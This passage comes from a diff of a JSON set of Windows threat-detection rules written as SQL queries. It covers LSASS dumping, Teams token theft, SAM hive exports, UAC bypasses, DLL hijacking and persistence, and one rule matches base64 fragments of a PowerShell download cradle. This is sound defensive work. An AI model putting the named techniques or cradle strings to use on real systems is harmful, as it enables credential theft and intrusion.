(Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": 